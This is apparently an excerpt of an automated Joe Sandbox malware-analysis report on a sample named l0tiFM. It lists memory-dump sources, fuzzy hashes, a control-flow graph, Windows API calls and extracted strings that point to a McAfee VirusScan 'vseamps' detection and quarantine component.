                                                                                                                • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                                                                • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                                                                                                • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                                                                • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                                                                • Instruction ID: 3ebcd1e3d86842839c1dba410951551620a7be1127b368d727b69c627f5226d5
                                                                                                                • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                                                                • Instruction Fuzzy Hash: 68F062B1B192958AEFA49F38E942E2A77D4E748380F988039D68D87B04D63C94608F04

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 357 140003d35-140003d49 353->357 355 1400039f3-140003a04 #4 354->355 356 140003a09-140003a1a EnterCriticalSection 354->356 355->356 358 140003a67 356->358 359 140003a1c-140003a34 356->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 365 140003a4b-140003a65 SetEvent ResetEvent 361->365 363 140003ab4-140003abe 362->363 364 140003a90-140003aad #4 362->364 366 140003ae8-140003af9 363->366 367 140003ac0-140003ae1 #4 363->367 364->363 365->362 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->357
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                                                                                • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                                                                                • API String ID: 1021822269-3147033232
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                                                                                • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                                                                                • API String ID: 883923345-381368982
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 1613947383-0
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1995290849-0
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1995290849-0
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                                                                                • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                                                                • API String ID: 93015348-1041928032
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                                                                                • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                                                                                • API String ID: 3682727354-300733478
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                                                                                • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                                                                                • API String ID: 2587151837-1427723692
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                                                                                • String ID: SetDllDirectoryW$kernel32.dll
                                                                                                                • API String ID: 3184163350-3826188083
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocProcesslstrlen
                                                                                                                • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                                                                • API String ID: 3424473247-996641649
                                                                                                                Similarity
                                                                                                                • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1775797328-0
                                                                                                                • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                                                                • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                                                                                • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                                                                • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                                                                                APIs
                                                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                                                                                • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                                                                                • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                                                                                • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 1232609184-0
                                                                                                                • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                                                                • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                                                                                • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                                                                • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                                                                                • String ID: H
                                                                                                                • API String ID: 2107338056-2852464175
                                                                                                                • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                                                                • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                                                                                • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                                                                • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                                                                                • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                                                                                • API String ID: 1322048431-2685357988
                                                                                                                • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                                                                • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                                                                                • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                                                                • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                                                                • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                                                                                • API String ID: 2984211723-3002863673
                                                                                                                • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                                                                • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                                                                                • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                                                                • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                                                                                • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                                                                                • API String ID: 678758403-4129911376
                                                                                                                • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                                                                • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                                                                                • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                                                                • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocProcesslstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3424473247-0
                                                                                                                • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                                                                • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                                                                                • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                                                                • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                                                                                • String ID: bad exception$csm$csm$csm
                                                                                                                • API String ID: 3766904988-820278400
                                                                                                                • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                                                                • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                                                                                                • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                                                                • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 2707001247-0
                                                                                                                • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                                                                • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                                                                                                • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                                                                • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                • String ID: csm$csm$csm
                                                                                                                • API String ID: 849930591-393685449
                                                                                                                • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                                                                • Instruction ID: 1356d442e3e1cbd580c23c4486f58e76ae064cc2ac78e26c56f4437b5130832d
                                                                                                                • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                                                                • Instruction Fuzzy Hash: 31D171B29087458AEF10AF75D4807AE77A0FB55788F984135DA8D6BB55CF38E489CB00
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859560861-0
                                                                                                                • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                                                                • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                                                                                                • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                                                                • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859560861-0
                                                                                                                • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                                                                • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                                                                                                • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                                                                • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                                                                • Instruction ID: a1cef2cd13d50d612b5117f40123c4705f743849a301ed93bbc353ed06221cba
                                                                                                                • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                                                                • Instruction Fuzzy Hash: 7F41C1B1B19A0281EE25EF36E910EBB2391BF05B90F8C4535DD4D6B794DE3CE8098740
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                                                                                • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                                                                • API String ID: 1119674940-1966266597
                                                                                                                • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                                                                • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                                                                                                • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                                                                • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
